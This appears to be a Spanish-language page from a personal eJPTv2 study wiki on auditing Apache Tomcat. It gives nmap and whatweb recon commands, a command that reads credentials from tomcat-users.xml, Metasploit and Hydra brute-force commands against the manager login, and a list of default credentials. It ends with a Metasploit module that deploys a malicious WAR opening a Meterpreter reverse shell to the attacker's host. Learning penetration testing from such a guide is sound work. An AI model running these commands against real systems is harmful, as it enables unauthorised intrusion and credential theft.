HenkoSec
  • 🕷️Whois @HenkoSec ?
  • 📚Diario cyber !
    • 🗃️¿Qué hay por aquí?
  • 🦂WriteUps !
    • ☢️WriteUps | TheHackersLabs
      • 👾FindMe - TheHackersLabs
  • 💯eJPTv2Wiki
    • 🔰Mi experiencia con la eJPTv2
    • 🔍Descubrimiento de HOSTS!
    • 🔍Puerto 21 - FTP
    • 🔍Puerto 22 - SSH
    • 🔍Puerto 25 - SMTP
    • 🔍Puerto 80/443 - HTTP/HTTPS
    • 🔍Puertos - 139,445 SMB
    • 🔍Puerto 1521 - Oracle Database
    • 🔍Puertp - 3306 - MySQL & SqlMap
    • 🔍3389 - RDP
    • 📂WordPress - CMS
    • 📂Drupal - CMS
    • 📂Joomla - CMS
    • 🛠️Gobuster - Fuzzing Web
    • 🛠️Ffuf - Fuzzing Web
    • 🛠️Dirbuster - Fuzzing Web
    • 🛠️John the Ripper - HASH
    • 🛠️Nikto - Escaner Web
    • 🌐Tomcat - Tecnology
    • 🌐Jenkins - Tecnology
    • 🌐Comandos de Red
    • 🌐WinRM
    • 🌐Microsoft IIS - Webshell - windows
    • 📍Servidor Web Local en Python
    • 📍Windows - Post-Explotación
    • ⚙️HotFixed
    • ⚙️TTY - Spawning
    • 📡Pivoting con Metasploit utilizando una máquina Windows
    • 📈Escala de privilegios en Linux
    • 📈Escalada de privilegios en Windows
Powered by GitBook
On this page
  • 🔍 Auditoría de Apache Tomcat – Descubrimiento y Explotación
  • 🕵️ Identificación de la Versión de Apache Tomcat
  • 🔹 Reconocimiento con Nmap
  • 🔹 Reconocimiento con WhatWeb
  • 🔹 Accediendo al Panel de Administración
  • ✔ Check List - Apache Tomcat
  • 🔑 Enumeración de Usuarios en Apache Tomcat
  • 🛠️ Ataque de Fuerza Bruta con Hydra
  • 🛠 Subida de War Malicioso con Metasploit
  1. eJPTv2Wiki

Tomcat - Tecnology

🔍 Auditoría de Apache Tomcat – Descubrimiento y Explotación

Apache Tomcat es un servidor de aplicaciones ampliamente utilizado para ejecutar aplicaciones web en Java. Debido a su popularidad, es un objetivo frecuente en auditorías de seguridad y pruebas de penetración. En esta guía, exploraremos técnicas para identificar la versión de Tomcat, enumerar usuarios y rutas sensibles, y explotar vulnerabilidades conocidas.


🕵️ Identificación de la Versión de Apache Tomcat

Determinar la versión del servidor es fundamental para detectar posibles vulnerabilidades. Podemos hacerlo de varias maneras:

🔹 Reconocimiento con Nmap

nmap -sV --script http-tomcat-enum <url>

🔹 Reconocimiento con WhatWeb

whatweb -v <url> # Muestra detalles de la versión detectada.

🔹 Accediendo al Panel de Administración

En muchos casos, la versión de Tomcat se puede encontrar directamente en su panel de administración:

http://<ip>:8080

Si la consola de administración es accesible, generalmente aparece en la página principal o en la sección "Server Status".


✔ Check List - Apache Tomcat

*💡 Importante: Si el acceso a estos directorios no está restringido, puede representar una vulnerabilidad grave.


🔑 Enumeración de Usuarios en Apache Tomcat

Tomcat almacena credenciales en tomcat-users.xml. Si tenemos acceso, podemos enumerar los usuarios configurados:

cat /etc/tomcat*/tomcat-users.xml

Si no tenemos acceso directo, podemos intentar un escaneo con Metasploit:

use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS <url>
set USER_FILE /usr/share/wordlists/metasploit/tomcat_mgr_default_users.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

💡 Explicación: ✔ tomcat_mgr_login → Escanea credenciales por defecto de Tomcat. ✔ USER_FILE y PASS_FILE → Diccionarios de usuario y contraseña.


🛠️ Ataque de Fuerza Bruta con Hydra

Si encontramos el panel de login de Tomcat, podemos probar credenciales con Hydra:

hydra -L <usernames_wordlists.txt> -P <password_wordlist.txt> <url> http-get /manager/html

💡 Explicación: ✔ -L → Lista de usuarios. ✔ -P → Diccionario de contraseñas. ✔ http-get /manager/html → Ataca el login de Tomcat.

Credenciales por defecto de Tomcat:

  • admin:admin

  • tomcat:tomcat

  • tomcat:s3cret

  • root:root

🛠 Subida de War Malicioso con Metasploit

Si tenemos credenciales válidas en el Manager, podemos subir un archivo .war para obtener acceso remoto.

use exploit/multi/http/tomcat_mgr_deploy 
set RHOSTS <url>
set HTTPUSERNAME <usuario> 
set HTTPPASSWORD <contraseña> 
set PAYLOAD java/meterpreter/reverse_tcp 
set LHOST <tu_ip> 
set LPORT 4444 
exploit

PreviousNikto - Escaner WebNextJenkins - Tecnology

Last updated 3 months ago

💯
🌐